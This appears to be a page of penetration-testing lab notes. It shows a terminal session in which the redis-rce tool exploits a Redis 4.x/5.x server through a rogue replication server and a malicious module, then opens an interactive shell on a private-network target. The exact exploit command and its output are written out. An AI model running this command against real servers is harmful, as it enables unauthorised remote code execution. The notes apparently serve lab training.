Exploitation

LogoGitHub - Ridter/redis-rce: Redis 4.x/5.x RCEGitHub
╭─ ο…Ό  ξ‚± ο„•  /home/kali/BG/redis-rce ξ‚± ο„“   master ?1 ▓▒░────────────────────────────────────────────────░▒▓ βœ” ξ‚³ 15s   ξ‚³ root@kali ξ‚°
╰─ python3 redis-rce.py -r 192.168.242.176 -p 6379 -L 192.168.49.242 -P 6379 -f /home/kali/BG/redis-rce/redis-rogue-server/RedisModulesSDK/exp/exp.so

β–ˆβ–„β–„β–„β–„ β–„β–ˆβ–ˆβ–ˆβ–„   β–ˆβ–ˆβ–„   β–„β–ˆ    β–„β–„β–„β–„β–„       β–ˆβ–„β–„β–„β–„ β–„β–ˆβ–„    β–„β–ˆβ–ˆβ–ˆβ–„   
β–ˆ  β–„β–€ β–ˆβ–€   β–€  β–ˆ  β–ˆ  β–ˆβ–ˆ   β–ˆ     β–€β–„     β–ˆ  β–„β–€ β–ˆβ–€ β–€β–„  β–ˆβ–€   β–€  
β–ˆβ–€β–€β–Œ  β–ˆβ–ˆβ–„β–„    β–ˆ   β–ˆ β–ˆβ–ˆ β–„  β–€β–€β–€β–€β–„       β–ˆβ–€β–€β–Œ  β–ˆ   β–€  β–ˆβ–ˆβ–„β–„    
β–ˆ  β–ˆ  β–ˆβ–„   β–„β–€ β–ˆ  β–ˆ  β–β–ˆ  β–€β–„β–„β–„β–„β–€        β–ˆ  β–ˆ  β–ˆβ–„  β–„β–€ β–ˆβ–„   β–„β–€ 
  β–ˆ   β–€β–ˆβ–ˆβ–ˆβ–€   β–ˆβ–ˆβ–ˆβ–€   ▐                  β–ˆ   β–€β–ˆβ–ˆβ–ˆβ–€  β–€β–ˆβ–ˆβ–ˆβ–€   
 β–€                                     β–€                   


[*] Connecting to  192.168.242.176:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.242.176:6379
[*] Setting filename
[+] Accepted connection from 192.168.242.176:6379
[*] Start listening on 192.168.49.242:6379
[*] Tring to run payload
[+] Accepted connection from 192.168.242.176:46704
[*] Closing rogue server...

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ ls
$ whoami
exp_lin.so
exp.so
snap.lxd
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-logind.service-D0hrMh
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-resolved.service-kR64tg
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-timesyncd.service-i0lI9g
vmware-root_708-2998936538
$ nc
Aprudence
PreviousRedisNextPriv Escalation

Last updated